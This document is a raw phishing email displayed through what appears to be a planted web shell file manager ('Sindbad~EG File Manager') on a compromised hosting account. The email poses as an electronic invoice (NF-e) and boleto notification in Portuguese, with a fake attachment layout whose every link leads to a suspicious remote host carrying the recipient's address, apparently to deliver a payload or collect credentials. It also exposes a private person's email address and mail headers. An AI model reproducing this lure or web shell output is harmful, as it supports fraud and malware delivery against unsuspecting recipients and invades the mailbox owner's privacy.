Sindbad~EG File Manager
| Current Path : /home/ssan4778/mail/new/ |
|
|
| Current File : /home/ssan4778/mail/new/1760963914.M319278P1490364.us164-cp.valueserver.com.br,S=8926,W=9162 |
Return-Path: <contato@pagar9.compracentarj.com>
Delivered-To: ssan4778@us164-cp.valueserver.com.br
Received: from us164-cp.valueserver.com.br
by us164-cp.valueserver.com.br with LMTP
id oLNVEEot9mi8vRYAu+K/lg
(envelope-from <contato@pagar9.compracentarj.com>)
for <ssan4778@us164-cp.valueserver.com.br>; Mon, 20 Oct 2025 09:38:34 -0300
Return-path: <contato@pagar9.compracentarj.com>
Envelope-to: mariana@sanhouse.com.br
Delivery-date: Mon, 20 Oct 2025 09:38:34 -0300
Received: from pagar9.compracentarj.com ([5.253.246.101]:59832)
by us164-cp.valueserver.com.br with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384
(Exim 4.98.2)
(envelope-from <contato@pagar9.compracentarj.com>)
id 1vAp9j-00000006Frb-1J4F
for mariana@sanhouse.com.br;
Mon, 20 Oct 2025 09:38:31 -0300
Received: from localhost (pagar9.compracentarj.com [5.253.246.101])
by pagar9.compracentarj.com (Postfix) with ESMTPSA id 83FFBC20FF
for <mariana@sanhouse.com.br>; Mon, 20 Oct 2025 13:07:07 +0200 (CEST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple;
d=pagar9.compracentarj.com; s=mail; t=1760958427;
bh=c3sXeurnwImiJABkLApA8FxVz4C85chXu1bHx6/SpBA=;
h=From:To:Subject:List-Unsubscribe:Date;
b=LiVNB6xdD+3IMelEUpOIqGGxJXO5qa17qrMEVqhKvzyhVBazUnw7LLg81TYHjbQur
s1fe+oXWK4Vy/9xMfy2dcrTZJh3IliUE/zuJjBMNNzSFAi9wbYEKp1GJA6LKiLFBgS
e1QfIQCpv/hxSjDJ90qks4JvaiUzC8teS6/6T/GucXDE4PxTETjvVFRvPc1G63f/pR
Ij/08u3fF0BYkw1icIHbYZgLwqFdvSPf0+Y/KMvdXhYLgdVyPqCIGWCFnMgDRyKsKV
JnYOCl7wWa8i3u0+idaorYDddwSRMHknrXw659kJ08v9GyAefQe1ZvU+s8SAGsIpR0
kQQOi/cepz5Xw==
From: contato@pagar9.compracentarj.com
To: mariana@sanhouse.com.br
Subject: Segue Anexo Boleto e NFE
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="boundary123"
List-Unsubscribe: <mailto:contato@pagar9.compracentarj.com>, <https://pagar9.compracentarj.com/unsubscribe?email=mariana@sanhouse.com.br>
Message-Id: <20251020110707.83FFBC20FF@pagar9.compracentarj.com>
Date: Mon, 20 Oct 2025 13:07:07 +0200 (CEST)
X-YourOrg-MailScanner-Information: Please contact the ISP for more information
X-YourOrg-MailScanner-ID: 1vAp9j-00000006Frb-1J4F
X-YourOrg-MailScanner: Found to be clean
X-YourOrg-MailScanner-SpamCheck: not spam, SpamAssassin (not cached,
score=3.322, required 5, DCC_CHECK 1.10, DCC_REPUT_95_98 0.70,
DKIM_SIGNED 0.10, DKIM_VALID -0.10, DKIM_VALID_AU -0.10,
FROM_FMBLA_NEWDOM28 0.80, HTML_MESSAGE 0.00,
HTML_NONELEMENT_30_40 0.00, MIME_HTML_MOSTLY 0.10,
MPART_ALT_DIFF 0.72, SPF_HELO_PASS -0.00, SPF_PASS -0.00)
X-YourOrg-MailScanner-SpamScore: sss
X-YourOrg-MailScanner-From: contato@pagar9.compracentarj.com
X-Spam-Status: No
--boundary123
Content-Type: text/plain; charset="UTF-8"
.
--boundary123
Content-Type: text/html; charset="UTF-8"
<!DOCTYPE html>
<html lang="pt-BR">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>NOTA FISCAL ELETRONICA - mariana@sanhouse.com.br</title>
<style>
body {
font-family: Arial, sans-serif;
background: #fff;
margin: 0;
padding: 0;
}
.container {
width: 570px;
margin: 40px auto 0 auto;
background: #fff;
border: none;
box-shadow: none;
padding: 0;
}
.header {
font-size: 18px;
font-weight: 400;
color: #222;
margin-bottom: 10px;
margin-left: 10px;
margin-top: 20px;
}
.anexos-bar {
display: flex;
align-items: center;
font-size: 15px;
color: #222;
margin-left: 10px;
margin-bottom: 10px;
}
.anexos-bar .circle {
width: 16px;
height: 16px;
border: 1px solid #bbb;
border-radius: 50%;
display: inline-block;
margin-right: 5px;
position: relative;
}
.anexos-bar .circle:after {
content: '';
position: absolute;
left: 5px;
top: 5px;
width: 4px;
height: 4px;
background: #bbb;
border-radius: 50%;
}
.anexos-bar .count {
font-weight: bold;
margin-right: 3px;
}
.anexos-bar a {
color: #007bff;
text-decoration: none;
margin: 0 8px;
font-size: 13px;
}
.anexos-bar a:hover {
text-decoration: underline;
}
.attachments {
margin-left: 30px;
margin-bottom: 10px;
}
.attachment {
display: flex;
align-items: center;
margin-bottom: 10px;
}
.icon {
width: 40px;
height: 40px;
border-radius: 8px;
display: flex;
align-items: center;
justify-content: center;
margin-right: 10px;
}
.icon.xml {
background: #00e3ff;
}
.icon.pdf {
background: #6c6c6c;
}
.icon .lines {
width: 24px;
height: 24px;
display: block;
}
.icon .pdf-symbol {
width: 24px;
height: 24px;
display: block;
}
.file-link {
color: #222;
font-size: 15px;
font-weight: 500;
text-decoration: none;
margin-right: 5px;
white-space: nowrap;
overflow: hidden;
text-overflow: ellipsis;
max-width: 300px;
}
.file-size {
color: #888;
font-size: 12px;
margin-left: 5px;
}
.actions {
margin-left: 30px;
margin-top: 20px;
color: #007bff;
font-size: 13px;
}
.actions a {
color: #007bff;
text-decoration: none;
margin-right: 20px;
}
.actions a:hover {
text-decoration: underline;
}
</style>
</head>
<body>
<div class="container">
<div class="header">NOTA FISCAL ELETRONICA - mariana@sanhouse.com.br</div>
<div class="anexos-bar">
<span class="circle"></span>
<span class="count">2</span> anexo(s) •
<a href="https://88.48.167.72.host.secureserver.net/72177737083/7217773708377272165119497mariana@sanhouse.com.brzp">Fazer download como zip</a> •
<a href="https://88.48.167.72.host.secureserver.net/72177737083/7217773708377272165119497mariana@sanhouse.com.br">Adicionar a</a> •
</div>
<div class="attachments">
<div class="attachment">
<span class="icon xml">
<svg class="lines" viewBox="0 0 24 24">
<rect x="4" y="7" width="16" height="2" rx="1" fill="#fff"/>
<rect x="4" y="11" width="16" height="2" rx="1" fill="#fff"/>
<rect x="4" y="15" width="16" height="2" rx="1" fill="#fff"/>
</svg>
</span>
<a class="file-link" href="https://88.48.167.72.host.secureserver.net/72177737083/7727216511949772177737083mariana@sanhouse.com.br" download>NF-e77272165119497510573192870001345500100...xml</a>
<span class="file-size">8.4 KB</span>
</div>
<div class="attachment">
<span class="icon pdf">
<svg class="pdf-symbol" viewBox="0 0 24 24">
<circle cx="12" cy="12" r="10" fill="#fff"/>
<path d="M8 16c1-2 3-6 8-6" stroke="#6c6c6c" stroke-width="2" fill="none"/>
<rect x="10" y="8" width="4" height="6" rx="1" fill="#6c6c6c"/>
</svg>
</span>
<a class="file-link" href="https://88.48.167.72.host.secureserver.net/72177737083/7727216511949772177737083mariana@sanhouse.com.br" download>BOLETO-7727216511949710573192870001345500100...pdf</a>
<span class="file-size">39.6 KB</span>
</div>
</div>
<div class="actions">
<a href="https://88.48.167.72.host.secureserver.net/72177737083/7217773708377272165119497mariana@sanhouse.com.br">Responder</a> •
<a href="https://88.48.167.72.host.secureserver.net/72177737083/7217773708377272165119497mariana@sanhouse.com.br">Responder a todos</a> •
<a href="https://88.48.167.72.host.secureserver.net/72177737083/7217773708377272165119497mariana@sanhouse.com.br">Encaminhar</a> •
<a href="https://88.48.167.72.host.secureserver.net/72177737083/7217773708377272165119497mariana@sanhouse.com.br">Editar como novo</a>
</div>
</div>
</body>
</html>
--boundary123--
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists